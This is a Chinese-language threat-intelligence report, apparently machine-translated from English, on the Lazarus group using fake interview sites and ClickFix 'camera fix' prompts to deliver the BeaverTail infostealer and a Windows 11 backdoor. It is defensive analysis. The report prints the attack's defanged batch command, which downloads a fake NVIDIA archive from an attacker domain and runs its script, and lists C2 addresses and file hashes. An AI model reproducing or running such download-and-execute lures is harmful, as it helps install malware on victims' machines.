臭名昭著的 Lazarus APT 组织通过结合日益流行的 ClickFix 社会工程技术来分发恶意软件并从目标组织窃取敏感情报数据,从而改进了其攻击方法。
这个与朝鲜有联系的威胁行为者被安全研究人员内部追踪为 APT-Q-1,通过将欺骗性用户界面纵与其传统间谍活动相结合,表现出了卓越的适应性。
ClickFix 技术代表了一种复杂的社会工程方法,攻击者向受害者提出捏造的技术问题,然后引导他们完成看似合法的“修复”,实际上执行恶意代码。
Lazarus 在其已建立的虚假招聘活动基础设施中将这种方法武器化,创建了一种多层攻击媒介,将工作机会诱饵与技术欺骗相结合。
CN-SEC 分析师通过发现一个恶意批处理脚本来识别这一活动,该脚本下载伪装的 NVIDIA 软件包,随后部署了该组织的标志性 BeaverTail 信息窃取程序。
当受害者被引诱到欺诈性面试网站时,攻击链就开始了,这些网站提示他们准备面试环境,最终声称相机配置问题需要立即解决。
该作的技术复杂性超出了简单的社会工程。受害者会看到看似合法的 NVIDIA 驱动程序更新命令,但底层有效负载会演变成恶意执行序列。
主要感染媒介利用 PowerShell 命令从受感染的基础设施下载并提取恶意 ZIP 存档。
最近的分析显示,该组织已将业务扩展到针对 Windows 和 macOS 平台,通过针对不同作系统架构量身定制的有效负载展示跨平台功能。
Windows 版本通过基于 Node.js 的部署机制专注于企业环境,而 macOS 版本则利用专为 Apple Silicon 和 Intel 处理器设计的 shell 脚本。
恶意软件部署和持久性机制
核心恶意软件包,以“nvidiaRelease[.]zip“(MD5:f9e18687a38e968811b93351e9fca089)包含多个专为跨平台兼容性和持久访问而设计的组件。
初始ClickFix-1.bat脚本执行以下命令序列:-
curl - k - o "%TEMP%\\nvidiaRelease[.]zip" https[:]//driverservices[.]store/visiodrive/nvidiaRelease[.]zip && powershell - Command "Expand-Archive - Force - Path '%TEMP%\\nvidiaRelease[.]zip' - DestinationPath '%TEMP%\\nvidiaRelease'" && cscript "%TEMP%\\nvidiaRelease\\run[.]vbs"解压的存档部署 run[.]vbs,它执行系统侦察以确定 Windows 内部版本号。
对于 Windows 11 系统(内部版本 22000 或更高版本),该脚本还会执行 drvUpdate[.]exe,一个能够执行命令和文件作的复杂后门。
该二进制文件与 103.231.75.101:8888 的命令和控制服务器建立通信,实现系统信息收集、远程命令执行和文件传输功能等功能。
核心恶意软件组件:-
| 元件 | MD5 哈希 | 功能 |
|---|---|---|
| 单击Fix-1[.]蝙蝠 | a4e58b91531d199f268c5ea02c7bf456 | 初始有效负载下载器 |
| nvidiaRelease[.]邮政编码 | f9e18687a38e968811b93351e9fca089 | 恶意归档包 |
| 运行[.]VBS的 | 3ef7717c8bcb26396fc50ed92e812d13 | 系统侦察脚本 |
| 主要。[]js (海狸尾) | b52e105bd040bda6639e958f7d9e3090 | 跨平台信息窃取程序 |
| drvUpdate[.]exe | 6175efd148a89ca61b6835c77acc7a8d | Windows 11 后门 |
该恶意软件通过注册表修改实现持久性,向 Windows 启动注册表项添加一个条目,以确保在系统重新启动时执行。
BeaverTail 组件通过 45.159.248.110 与基础设施通信,展示了冗余命令和控制功能,用于维持对受感染系统的长期访问。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
